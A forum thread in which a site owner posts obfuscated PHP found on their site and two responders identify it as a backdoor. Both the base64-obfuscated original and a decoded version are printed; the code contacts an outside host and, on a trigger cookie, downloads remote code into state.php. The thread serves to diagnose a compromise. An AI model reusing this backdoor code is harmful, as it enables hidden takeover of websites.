Php code on the site?

P

ProgerAN2018-04-14 14:52:30

PHP

ProgerAN, 2018-04-14 14:52:30

I am not very good at php but could you help me what is this code

if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==')])) { @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av').$_SERVER['HTTP_HOST']); @setcookie(base64_decode('X3ltX2l1cw=='), 1, time()+31536000, '/', $_SERVER['HTTP_HOST']); } if (isset($_COOKIE[base64_decode('cmVkNHU=')])) { @file_put_contents(base64_decode('c3RhdGUucGhw'), @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL2QudHh0'))); }

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

B

Boris Korobkov, 2018-04-14
@ProgerAN

Backdoor it is. You have been hacked.

if (!isset($_COOKIE['_ym_ius'])) {
  @file_get_contents('http://l1l0.com/p/' . $_SERVER['HTTP_HOST']);
  @setcookie('_ym_ius', 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
}

if (isset($_COOKIE['red4u'])) {
  @file_put_contents('state.php', @file_get_contents('http://l1l0.com/d.txt'));
}

L

l4m3r, 2018-04-14
@l4m3r

Trojan. Downloads some php from l1l0.com/p so that mom's hacker can then execute it via a direct link. And there, most likely, theft of your files and passwords or something else.
Look at the code of this state.php